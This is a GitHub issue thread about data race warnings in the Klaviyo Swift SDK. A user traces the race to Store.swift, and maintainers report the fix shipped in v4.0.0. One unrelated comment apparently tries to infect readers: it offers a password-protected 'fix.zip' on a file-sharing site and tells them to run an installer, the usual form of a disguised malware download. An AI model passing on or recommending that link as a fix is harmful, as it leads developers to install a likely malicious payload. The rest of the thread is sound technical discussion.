### ISSUE TITLE
Concurrency issues

### ISSUE THREAD

**Issue by deivitaka** [klaviyo/klaviyo-swift-sdk#191]
### Checklist

- [X] I have read the [contributing guidelines](https://github.com/klaviyo/klaviyo-swift-sdk/blob/master/.github/CONTRIBUTING.md)
- [ ] I have determined whether this bug is also reproducible in a vanilla SwiftUI project.
- [X] If possible, I've reproduced the issue using the `main` branch of this package.
- [X] This issue hasn't been addressed in an [existing GitHub issue](https://github.com/klaviyo/klaviyo-swift-sdk/issues) or [discussion](https://github.com/pointfreeco/klaviyo/klaviyo-swift-sdk/discussions).

### Description

Running our project with strict concurrency set to 'complete', produces a couple of data race warnings. We tried making sure all the calls to KlaviyoSDK are done on the main thread, tried using MainActor, but without success, even though internally the library is dispatching actions to main thread.

![Screenshot 2024-08-27 at 17 17 05](https://github.com/user-attachments/assets/f36f7a1c-db6a-4c58-a1df-4113c0d2451e)
![Screenshot 2024-08-27 at 17 16 26](https://github.com/user-attachments/assets/d6a83e47-2da6-442a-82cf-2df20e735434)

### Expected behavior

Klaviyo would be thread safe and handle concurrent events

### Actual behavior

XCode is giving warnings, but we have also Crashytics logs that are related. There is not much info for debugging unfortunately.

![Screenshot 2024-08-27 at 17 11 05](https://github.com/user-attachments/assets/f841e768-0e91-4edc-81f1-50540a2ce21b)

### Steps to reproduce

Currently just running the app and logging initial events is enough to reproduce it for us, but could not reproduce it yet on a new project.

This calls are made at launch, and then a few seconds later the warnings show.
```
>>> initialize(with:)
>>> create(event:)
>>> create(event:)
>>> set(pushToken:)
```

### The Klaviyo Swift SDK version information

3.2.0

### Destination operating system

iOS 17.5, 18.0

### Xcode version information

XCode 16 beta 6

### Swift Compiler version information

```shell
swift-driver version: 1.90.11.1 Apple Swift version 5.10 (swiftlang-5.10.0.13 clang-1500.3.9.4)
Target: arm64-apple-macosx14.0
```

**Comment by ajaysubra** [comment]
Hey @deivitaka thanks for reporting this issue. We'll take a look on our end and get back to you if we have any questions else you'll hear from us as and when we have any updates to share.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by deivitaka** [comment]
@ajaysubra thank you. we tried adding the library locally and changing Store.swift line 276 should fix it

`return Task { @MainActor in`

Although `send` function is making sure to run on Main thread, `tasks` is read from another while possibly still writing on line 266. So this will make sure it is also read on the Main thread

**Comment by ajaysubra** [comment]
Thanks for trying this our locally and sharing your findings. This is definitely help us debug the issue quicker.

**Comment by ab1470** [comment]
Hi @deivitaka, thanks for sharing your findings on this issue. We've addressed it; the fix will go out in an upcoming release.

**Comment by ab1470** [comment]
This has been addressed with #200, and the fix has been incorporated into [SDK v4.0.0.](https://github.com/klaviyo/klaviyo-swift-sdk/releases/tag/4.0.0).
